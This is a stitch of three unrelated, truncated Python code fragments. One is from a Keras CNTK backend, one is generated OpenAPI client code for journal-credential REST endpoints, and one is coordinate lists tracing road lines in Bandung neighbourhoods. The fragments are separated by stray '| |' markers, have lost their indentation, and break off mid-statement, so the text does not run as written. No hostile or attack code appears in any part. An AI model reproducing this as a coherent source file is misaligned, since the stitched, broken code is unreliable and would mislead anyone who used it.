non_dyn_shape.append(x.shape[i])
else:
non_dyn_shape.append(shape[i + num_dynamic])
return shape[:num_dynamic] + non_dyn_shape
def is_sparse(tensor):
return tensor.is_sparse
def int_shape(x):
if hasattr(x, '_keras_shape'):
return x._keras_shape
shape = x.shape
if hasattr(x, 'dynamic_axes'):
dynamic_shape = [None for a in x.dynamic_axes]
shape = tuple(dynamic_shape) + shape
return shape
def ndim(x):
shape = int_shape(x)
return len(shape)
def _prepare_name(name, default):
prefix = '_'.join(NAME_SCOPE_STACK)
if name is None or name == '':
return prefix + '/' + default
return prefix + '/' + name
def constant(value, dtype=None, shape=None, name=None):
if dtype is None:
dtype = floatx()
if shape is None:
shape = ()
np_value = value * np.ones(shape)
const = C.constant(np_value,
dtype=dtype,
name=_prepare_name(name, 'constant'))
const._keras_shape = const.shape
const._uses_learning_phase = False
return const
def random_binomial(shape, p=0.0, dtype=None, seed=None):
# use numpy workaround now
if seed is None:
# ensure that randomness is conditioned by the Numpy RNG
seed = np.random.randint(10e7)
np.random.seed(seed)
if dtype is None:
dtype = np.float32
else:
dtype = _convert_string_dtype(dtype)
size = 1
for _ in shape:
if _ is None:
raise ValueError('CNTK Backend: randomness op with '
'dynamic shape is not supported now. '
'Please provide fixed dimension '
'instead of `None`.')
size *= _
binomial = np.random.binomial(1, p, size).astype(dtype).reshape(shape)
return variable(value=binomial, dtype=dtype)
def random_uniform(shape, minval=0.0, maxval=1.0, dtype=None, seed=None):
for _ in shape:
if _ is None:
raise ValueError('CNTK Backend: randomness op with '
'dynamic shape is not supported now. '
'Please provide fixed dimension '
'instead of `None`.')
return random_uniform_variable(shape, minval, maxval, dtype, seed)
def random_uniform_variable(shape, low, high,
dtype=None, name=None, seed=None):
if dtype is None:
dtype = floatx()
if seed is None:
# ensure that randomness is conditioned by the Numpy RNG
seed = np.random.randint(10e3)
if dtype is None:
dtype = np.float32
else:
dtype = _convert_string_dtype(dtype)
if | |
without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
JournalCredential
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['journal_id'] = \
journal_id
kwargs['credential_id'] = \
credential_id
return self.call_with_http_info(**kwargs)
self.insight_project_journal_credential_get = _Endpoint(
settings={
'response_type': (JournalCredential,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/insight/{locationId}/project/{projectId}/journal/{journalId}/credential/{credentialId}',
'operation_id': 'insight_project_journal_credential_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'journal_id',
'credential_id',
],
'required': [
'project_id',
'location_id',
'journal_id',
'credential_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'journal_id':
(str,),
'credential_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'journal_id': 'journalId',
'credential_id': 'credentialId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'journal_id': 'path',
'credential_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__insight_project_journal_credential_get
)
def __insight_project_journal_credential_list(
self,
project_id,
location_id,
journal_id,
**kwargs
):
"""List insight/journal.credential # noqa: E501
List insight/journal.credential # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.insight_project_journal_credential_list(project_id, location_id, journal_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
journal_id (str): Journal Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[JournalCredential]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['journal_id'] = \
journal_id
return self.call_with_http_info(**kwargs)
self.insight_project_journal_credential_list = _Endpoint(
settings={
'response_type': ([JournalCredential],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/insight/{locationId}/project/{projectId}/journal/{journalId}/credential',
'operation_id': 'insight_project_journal_credential_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'journal_id',
],
'required': [
'project_id',
'location_id',
'journal_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'journal_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'journal_id': 'journalId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'journal_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__insight_project_journal_credential_list
)
def __insight_project_journal_credential_patch(
self,
project_id,
location_id,
journal_id,
credential_id,
insight_project_journal_credential_patch,
**kwargs
):
"""Update insight/journal.credential # noqa: E501
Update insight/journal.credential # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.insight_project_journal_credential_patch(project_id, location_id, journal_id, credential_id, insight_project_journal_credential_patch, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
journal_id (str): Journal Id
credential_id (str): credentialId
insight_project_journal_credential_patch (InsightProjectJournalCredentialPatch):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
JournalCredential
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['journal_id'] = \
journal_id
kwargs['credential_id'] = \
credential_id
kwargs['insight_project_journal_credential_patch'] = \
insight_project_journal_credential_patch
return self.call_with_http_info(**kwargs)
self.insight_project_journal_credential_patch = _Endpoint(
settings={
'response_type': (JournalCredential,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/insight/{locationId}/project/{projectId}/journal/{journalId}/credential/{credentialId}',
'operation_id': 'insight_project_journal_credential_patch',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'journal_id',
'credential_id',
'insight_project_journal_credential_patch',
],
'required': [
'project_id',
'location_id',
'journal_id',
'credential_id',
'insight_project_journal_credential_patch',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'journal_id':
(str,),
'credential_id':
(str,),
'insight_project_journal_credential_patch':
(InsightProjectJournalCredentialPatch,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'journal_id': 'journalId',
'credential_id': 'credentialId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'journal_id': 'path',
'credential_id': 'path',
'insight_project_journal_credential_patch': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__insight_project_journal_credential_patch
)
def __insight_project_journal_delete(
self,
project_id,
location_id,
journal_id,
**kwargs
):
"""Delete insight/journal # noqa: E501
Delete journal # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.insight_project_journal_delete(project_id, location_id, journal_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
journal_id (str): Journal Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['journal_id'] = \
journal_id
return self.call_with_http_info(**kwargs)
self.insight_project_journal_delete = _Endpoint(
settings={
'response_type': None,
'auth': [
'BearerAuth'
],
'endpoint_path': '/insight/{locationId}/project/{projectId}/journal/{journalId}',
'operation_id': 'insight_project_journal_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'journal_id',
],
'required': [
'project_id',
'location_id',
'journal_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
| |
[107.5673473,-6.8934426],
[107.567197,-6.8937036],
[107.5674331,-6.8938474],
[107.567197,-6.8937036],
[107.5670468,-6.8939539],
[107.567197,-6.8937036],
[107.5673473,-6.8934426],
[107.5673918,-6.8934267],
[107.5675618,-6.8934853],
[107.5677549,-6.8935971],
[107.5677818,-6.893677],
[107.5676852,-6.8938634],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5648649,-6.8914296],
[107.5654767,-6.8916706],
[107.5654982,-6.8916147],
[107.5654767,-6.8916706],
[107.5658814,-6.891821],
[107.5658496,-6.8919396],
[107.5658814,-6.891821],
[107.5660856,-6.891857],
[107.5661017,-6.8918038],
[107.5660933,-6.8918396],
[107.566096,-6.8919515],
[107.5658559,-6.8926917],
[107.5657691,-6.8926799],
[107.5655824,-6.8926145],
[107.5657691,-6.8926825],
[107.5658559,-6.8926917],
[107.5655931,-6.8933281],
[107.5654161,-6.8932989],
[107.5655555,-6.8928994],
[107.5654161,-6.8932989],
[107.5652122,-6.8935172],
[107.5654161,-6.8932989],
[107.5655931,-6.8933281],
[107.5657084,-6.8930539],
[107.5661698,-6.893227],
[107.5663522,-6.8928116],
[107.5664836,-6.8929127],
[107.5663522,-6.8928116],
[107.5664809,-6.8924894],
[107.5660035,-6.8922524],
[107.5664809,-6.8924894],
[107.5665332,-6.8923775],
[107.5669328,-6.8925346],
[107.5665332,-6.8923775],
[107.5665842,-6.8922337],
[107.5665577,-6.8921633],
[107.566096,-6.8919515],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5645095,-6.8932962],
[107.564906,-6.8936092],
[107.5650572,-6.8937553],
[107.5652261,-6.893517],
[107.5650853,-6.8934371],
[107.5650424,-6.8933612],
[107.5650531,-6.8932494],
[107.5651076,-6.8930699],
[107.5648662,-6.8929607],
[107.5651076,-6.8930699],
[107.5652712,-6.892713],
[107.5652364,-6.8927836],
[107.5650003,-6.8926851],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5650859,-6.894871],
[107.5649973,-6.8950414],
[107.5650724,-6.8950787],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5647506,-6.8957444],
[107.5650142,-6.8958335],
[107.565051,-6.8958136],
[107.565338,-6.8952704],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5599402,-6.8953401],
[107.5601682,-6.8956996],
[107.5602335,-6.8957136],
[107.5606604,-6.8959371],
[107.5607914,-6.8960384],
[107.5608343,-6.8961183],
[107.5608396,-6.8962195],
[107.5606697,-6.8965144],
[107.5601682,-6.8956996],
[107.5606697,-6.8965144],
[107.561225,-6.8974171],
[107.5615853,-6.8971515],
[107.5618964,-6.8967574],
[107.5615853,-6.8971515],
[107.561225,-6.8974171],
[107.5613001,-6.8975396],
[107.5615048,-6.8974124],
[107.5613001,-6.8975396],
[107.5615254,-6.897915],
[107.5622451,-6.8974817],
[107.562449,-6.8975935],
[107.5624651,-6.8976841],
[107.562288,-6.8978598],
[107.5624651,-6.8976841],
[107.562449,-6.8975935],
[107.5622451,-6.8974817],
[107.5615254,-6.897915],
[107.5619116,-6.8985328],
[107.5621378,-6.8983551],
[107.5619116,-6.8985328],
[107.5620162,-6.8987299],
[107.5621088,-6.8986744],
[107.5620162,-6.8987299],
[107.5625634,-6.8996299],
[107.5629886,-6.8992762],
[107.5632032,-6.8989993],
[107.5634816,-6.8983231],
[107.56331,-6.8982086],
[107.5631624,-6.898198],
[107.5630498,-6.8980702],
[107.5628835,-6.8981447],
[107.5627816,-6.8983311],
[107.5628835,-6.8981447],
[107.5630498,-6.8980702],
[107.5631281,-6.8979182],
[107.5631651,-6.8978904],
[107.5633797,-6.8980076],
[107.56331,-6.8982086],
[107.5633797,-6.8980076],
[107.5631651,-6.8978904],
[107.5632751,-6.8976588],
[107.564702,-6.8986493],
[107.5641661,-6.8996427],
[107.5642117,-6.8997129],
[107.564378,-6.8998451],
[107.5646194,-6.8994931],
[107.5643512,-6.8993173],
[107.5646194,-6.8994931],
[107.5647642,-6.8992588],
[107.5644906,-6.899083],
[107.5647642,-6.8992588],
[107.5649922,-6.8988972],
[107.564702,-6.8986493],
[107.5649922,-6.8988972],
[107.5652202,-6.8990516],
[107.5649834,-6.8994079],
[107.5647642,-6.8992588],
[107.5649861,-6.8994079],
[107.5648574,-6.8996475],
[107.5646194,-6.8994931],
[107.5648574,-6.8996502],
[107.5646033,-6.9000368],
[107.5643699,-6.8998744],
[107.564378,-6.8998451],
[107.5643699,-6.8998744],
[107.5644263,-6.8999223],
[107.56404,-6.9004975],
[107.5645309,-6.9007957],
[107.5647079,-6.9005507],
[107.5646489,-6.9004629],
[107.5642385,-6.9001993],
[107.5646489,-6.9004629],
[107.5647079,-6.9005507],
[107.5649171,-6.9002392],
[107.5646033,-6.9000368],
[107.5649171,-6.9002392],
[107.5655255,-6.8992671],
[107.5652202,-6.8990516],
[107.5655255,-6.8992671],
[107.5651183,-6.8999223],
[107.5655742,-6.9002392],
[107.5652999,-6.9000443],
[107.5656735,-6.8995149],
[107.5654796,-6.8993493],
[107.5656735,-6.8995149],
[107.5658688,-6.8996505],
[107.5658237,-6.899688],
[107.5654991,-6.9001913],
[107.5658237,-6.899688],
[107.5658688,-6.8996505],
[107.5659544,-6.8996715],
[107.5664589,-6.9000073],
[107.5660753,-6.899757],
[107.5662121,-6.8996239],
[107.5667267,-6.8999008],
[107.566869,-6.8996741],
[107.5667993,-6.8995809],
[107.5664962,-6.8993839],
[107.5665605,-6.8993014],
[107.5664935,-6.8993839],
[107.566287,-6.8992534],
[107.5663781,-6.8992028],
[107.5662789,-6.8992561],
[107.5659168,-6.8990324],
[107.5659544,-6.8988939],
[107.5663325,-6.8980099],
[107.5676199,-6.8984603],
[107.5663325,-6.8980099],
[107.5651229,-6.8975945],
[107.5649592,-6.8979407],
[107.5649405,-6.8980845],
[107.5653052,-6.8982549],
[107.5649405,-6.8980845],
[107.5648198,-6.8984067],
[107.5659168,-6.8990324],
[107.5648036,-6.8984017],
[107.563999,-6.8978315],
[107.5648036,-6.8984017],
[107.5649405,-6.8980845],
[107.5649592,-6.8979407],
[107.5651229,-6.8975945],
[107.5636133,-6.8970598],
[107.5649061,-6.8975232],
[107.5654991,-6.8962457],
[107.5655847,-6.896221],
[107.5683769,-6.897161],
[107.5669875,-6.896703],
[107.5671217,-6.8963249],
[107.5669849,-6.8962583],
[107.5669527,-6.8962264],
[107.5666764,-6.8960719],
[107.5667461,-6.8958616],
[107.5665664,-6.895779],
[107.5663358,-6.8961145],
[107.5662124,-6.896253],
[107.5663358,-6.8961145],
[107.5665664,-6.895779],
[107.566612,-6.8956272],
[107.5667087,-6.8956643],
[107.5668133,-6.8956696],
[107.5668749,-6.8956991],
[107.566808,-6.8956696],
[107.5667087,-6.8956669],
[107.566612,-6.8956272],
[107.5665745,-6.8957338],
[107.5662687,-6.895582],
[107.5665745,-6.8957338],
[107.5665986,-6.8956619],
[107.5666469,-6.8955607],
[107.5664591,-6.8954329],
[107.5664053,-6.8953507],
[107.5661614,-6.8952065],
[107.5661105,-6.8952518],
[107.5660675,-6.8953796],
[107.5665986,-6.8956619],
[107.5660675,-6.8953796],
[107.5658852,-6.8960134],
[107.5659442,-6.8960293],
[107.5660622,-6.896048],
[107.5659442,-6.8960293],
[107.5658852,-6.8960134],
[107.5657618,-6.8962716],
[107.5658852,-6.8960134],
[107.56603,-6.8955234],
[107.5655177,-6.8952598],
[107.5656006,-6.895143],
[107.5656275,-6.8950498],
[107.5656572,-6.8949509],
[107.5656275,-6.8950524],
[107.5656033,-6.8951456],
[107.5655177,-6.8952598],
[107.5653834,-6.8955823],
[107.5652627,-6.8957927],
[107.5653807,-6.8955823],
[107.5655177,-6.8952598],
[107.56603,-6.8955234],
[107.5660675,-6.8953796],
[107.5661105,-6.8952518],
[107.5661614,-6.8952065],
[107.566384,-6.8948391],
[107.5662164,-6.8947043],
[107.5658945,-6.8951064],
[107.5662164,-6.8947043],
[107.5659696,-6.8944886],
[107.5659015,-6.8944306],
[107.5660249,-6.8942122],
[107.5659015,-6.8944306],
[107.5658372,-6.8943746],
[107.5659364,-6.8941909],
[107.5658372,-6.8943746],
[107.565408,-6.8940311],
[107.5652632,-6.8942175],
[107.565408,-6.8940311],
[107.5652685,-6.8939273],
[107.5650996,-6.8941802],
[107.5652685,-6.8939273],
[107.5651934,-6.8939033],
[107.5652873,-6.8937995],
[107.5651934,-6.8939033],
[107.565003,-6.8937116],
[107.5649279,-6.8937995],
[107.565003,-6.8937116],
[107.564906,-6.8936092],
[107.5647509,-6.8938474],
[107.5646677,-6.8940684],
[107.5644421,-6.8944663],
[107.5646677,-6.8940684],
[107.5643137,-6.8938607],
[107.5644075,-6.8936983],
[107.5643137,-6.8938607],
[107.5641259,-6.8941163],
[107.5643137,-6.8938607],
[107.5641179,-6.8937276],
[107.5639596,-6.8940045],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5662883,-6.891759],
[107.5668064,-6.892011],
[107.5668571,-6.8920704],
[107.5668544,-6.8921343],
[107.566892,-6.8922196],
[107.5668893,-6.8922835],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5667062,-6.8939379],
[107.566732,-6.8939459],
[107.5671595,-6.8942308],
[107.5672909,-6.8939912],
[107.5671595,-6.8942308],
[107.5674331,-6.8944066],
[107.5675672,-6.8942016],
[107.5676959,-6.8940631],
[107.5675672,-6.8942016],
[107.5674331,-6.8944066],
[107.5680124,-6.8948007],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.566384,-6.8948391],
[107.5667287,-6.8951037],
[107.5668977,-6.894896],
[107.5670774,-6.8946936],
[107.5668548,-6.8945498],
[107.5670774,-6.8946936],
[107.5672866,-6.8948241],
[107.5671659,-6.895101],
[107.5672165,-6.8951513],
[107.5670533,-6.8953726],
[107.5667287,-6.8951037],
[107.5674365,-6.8956839],
[107.5671217,-6.8963249],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5651612,-6.9012271],
[107.565019,-6.9014638],
[107.5653543,-6.9016398],
[107.5656493,-6.9017889],
[107.5656433,-6.9018904],
[107.5653463,-6.9023827],
[107.5650861,-6.9022496],
[107.5650378,-6.9021324],
[107.5651337,-6.9020022],
[107.5653543,-6.9016398],
[107.5651987,-6.9019114],
[107.5655126,-6.9020739],
[107.5651987,-6.9019114],
[107.565078,-6.9020632],
[107.564834,-6.9017274],
[107.565019,-6.9014638],
[107.564834,-6.9017274],
[107.5646569,-6.9018845],
[107.5647749,-6.9020579],
[107.5646569,-6.9018845],
[107.5641137,-6.9021941],
[107.5637918,-6.9016483],
[107.5641137,-6.9021941],
[107.5644034,-6.9026734],
[107.5647165,-6.9024614],
[107.5648849,-6.9026914],
[107.5648795,-6.9027712],
[107.5645911,-6.9029797],
[107.5644034,-6.9026734],
[107.5645911,-6.9029797],
[107.5652,-6.9039968],
[107.5652759,-6.9039315],
[107.5655119,-6.9035215],
[107.5656982,-6.9031164],
[107.565843,-6.9027277],
[107.5659732,-6.9023392],
[107.5669281,-6.9003421],
[107.5668208,-6.9005605],
[107.5675236,-6.9008747],
[107.567309,-6.9007815],
[107.5669227,-6.9015643],
[107.5664721,-6.901322],
[107.5669227,-6.9015643],
[107.5664453,-6.9025416],
[107.5659732,-6.9023392],
[107.5664453,-6.9025416],
[107.5668798,-6.9027439],
[107.5670339,-6.9027383],
[107.5670622,-6.9025629],
[107.5674485,-6.9017427],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5672263,-6.8961199],
[107.5676715,-6.8964101],
[107.5676956,-6.8964767],
[107.5677788,-6.8965273],
[107.5678603,-6.8965123],
[107.5680296,-6.8964031],
[107.5676993,-6.8959798],
[107.5674529,-6.8956975],
[107.567702,-6.8959771],
[107.5680296,-6.8964031],
[107.5683001,-6.8968212],
[107.56844,-6.8969251],
[107.5685553,-6.8968878],
[107.5685925,-6.8968132],
[107.5686032,-6.8967493],
[107.5686036,-6.8967892],
[107.5684423,-6.8965895],
[107.5682733,-6.8963392],
[107.5682254,-6.896254],
[107.56798,-6.8959758],
[107.5681017,-6.8958999],
[107.56798,-6.8959758],
[107.5676742,-6.8956216],
[107.5673184,-6.8953753],
[107.5673067,-6.8952994],
[107.567642,-6.8947802],
[107.5673067,-6.8952994],
[107.5673184,-6.895378],
[107.5676742,-6.8956216],
[107.5680292,-6.8950265],
[107.5679219,-6.8952075],
[107.5681017,-6.8958999],
[107.5682254,-6.8961502],
[107.5682254,-6.896254],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5637852,-6.8990676],
[107.5635867,-6.898977],
[107.5634794,-6.8989717],
[107.5632751,-6.8988477],
[107.5634794,-6.8989717],
[107.5629859,-6.899664],
[107.5630771,-6.899925],
[107.5628772,-6.9001332],
[107.5625634,-6.8996299],
[107.5628772,-6.9001332],
[107.5637918,-6.9016483],
[107.5639374,-6.9015708],
[107.5642378,-6.9011448],
[107.5645309,-6.9007957],
[107.5651612,-6.9012271],
[107.5655152,-6.900657],
[107.5655126,-6.9006064],
[107.5649171,-6.9002392],
[107.5655126,-6.9006064],
[107.5656708,-6.9004946],
[107.5657566,-6.9004946],
[107.5662609,-6.9007475],
[107.5661911,-6.9007103],
[107.5664406,-6.9001564],
[107.5665184,-6.9002097],
[107.5664406,-6.9001564],
[107.5661214,-6.8999221],
[107.566159,-6.8999514],
[107.5657566,-6.9004946],
[107.5659578,-6.900223],
[107.5660544,-6.9002709],
[107.5661885,-6.8999753],
[107.5660544,-6.9002709],
[107.5659149,-6.9005745],
]])
def jalanKelurahanCiroyom(self, nama):
self.jalan.record(nama)
self.jalan.line([[
[107.5840308,-6.915249],
[107.5842615,-6.9142664],
[107.5845351,-6.9142771],
[107.5845431,-6.9142478],
[107.5845807,-6.9137019],
[107.5848891,-6.9136514],
[107.5848918,-6.9135901],
[107.584983,-6.9135795],
[107.5850367,-6.913204],
[107.584924,-6.9132067],
[107.5850367,-6.913204],
[107.5851118,-6.9129031],
[107.5851359,-6.9128153],
[107.5852083,-6.9126022],
[107.58516,-6.9125836],
[107.5852405,-6.9123386],
[107.5844621,-6.9118109],
[107.5852405,-6.9123386],
[107.5857367,-6.9126875],
[107.5855785,-6.9130576],
[107.585439,-6.9135209],
[107.5849991,-6.9134596],
[107.585439,-6.9135235],
[107.5854014,-6.9137259],
[107.5854014,-6.9139815],
[107.5852915,-6.9139815],
[107.5854309,-6.9147564],
[107.5852888,-6.9148203],
[107.585321,-6.9151558],
[107.5853103,-6.9154833],
[107.5851842,-6.9154966],
[107.5851815,-6.9154327],
[107.5851842,-6.9154966],
[107.5851815,-6.9156191],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5850876,-6.9184706],
[107.586536,-6.9186623],
[107.5878127,-6.9187848],
[107.5878556,-6.918199],
[107.5879307,-6.918199],
[107.5878556,-6.918199],
[107.5878127,-6.9187848],
[107.5884028,-6.9188594],
[107.5889982,-6.9189233],
[107.5901462,-6.9190724],
[107.5917019,-6.9192747],
[107.5923242,-6.919344],
[107.5929357,-6.9194292],
[107.5930215,-6.9188221],
[107.5917829,-6.918673],
[107.5915737,-6.9185186],
[107.5914717,-6.9183109],
[107.5917185,-6.9181937],
[107.591461,-6.9183162],
[107.5914825,-6.9181511],
[107.5914771,-6.9183109],
[107.5909299,-6.9183748],
[107.5907529,-6.9181937],
[107.5901896,-6.9185186],
[107.590136,-6.9186624],
[107.5901462,-6.9190724],
[107.590136,-6.9186624],
[107.5901896,-6.9185186],
[107.590256,-6.91848],
[107.5901574,-6.9182363],
[107.5893079,-6.9181977],
[107.5893474,-6.9178156],
[107.5892938,-6.9183269],
[107.5895995,-6.9183641],
[107.5896371,-6.918215],
[107.5895995,-6.9183641],
[107.5895942,-6.9185399],
[107.5895995,-6.9183641],
[107.5892938,-6.9183269],
[107.5890631,-6.9183002],
[107.5889982,-6.9189233],
[107.5890631,-6.9183002],
[107.5885267,-6.9182363],
[107.5884028,-6.9188594],
[107.5885267,-6.9182363],
[107.5881994,-6.9181724],
[107.58806,-6.9181937],
[107.5881994,-6.9181724],
[107.5882316,-6.9177357],
[107.5879098,-6.9176931],
[107.5882316,-6.9177357],
[107.5881994,-6.9181724],
[107.5885267,-6.9182363],
[107.5887124,-6.9182576],
[107.5888163,-6.9172991],
[107.5889773,-6.9172298],
[107.5889987,-6.9171074],
[107.5889773,-6.9172298],
[107.5888163,-6.9172991],
[107.5887626,-6.9172586],
[107.5884622,-6.9172347],
[107.5878239,-6.9171415],
[107.5872043,-6.9170935],
[107.5870353,-6.9171415],
[107.5867617,-6.9171441],
[107.5866705,-6.9171388],
[107.5866437,-6.9173145],
[107.5865364,-6.9173465],
[107.5864774,-6.9174743],
[107.5865042,-6.9175968],
[107.5865525,-6.9177672],
[107.5865632,-6.918108],
[107.586536,-6.9186623],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5851589,-6.9176585],
[107.5852342,-6.9176629],
[107.5852879,-6.9171677],
[107.5852342,-6.9176629],
[107.5861998,-6.9177375],
[107.586232,-6.9173647],
[107.5854917,-6.9172955],
[107.5853844,-6.9180304],
[107.5861569,-6.9180996],
[107.5861998,-6.9177375],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5930215,-6.9188221],
[107.5931774,-6.9177051],
[107.5931077,-6.9177158],
[107.5931774,-6.9177051],
[107.5932954,-6.9170661],
[107.5933169,-6.9165122],
[107.5927697,-6.9164803],
[107.5928233,-6.9160383],
[107.592877,-6.915969],
[107.5928877,-6.915772],
[107.592877,-6.915969],
[107.5929521,-6.915985],
[107.5929574,-6.9158226],
[107.5929521,-6.915985],
[107.5932149,-6.9160289],
[107.5929521,-6.915985],
[107.592877,-6.915969],
[107.5928233,-6.9160383],
[107.5927697,-6.9164803],
[107.5913213,-6.9164962],
[107.5910531,-6.9168104],
[107.5909136,-6.917966],
[107.5907529,-6.9181937],
[107.5909136,-6.917966],
[107.590974,-6.9174628],
[107.5910531,-6.9168104],
[107.5910531,-6.9164962],
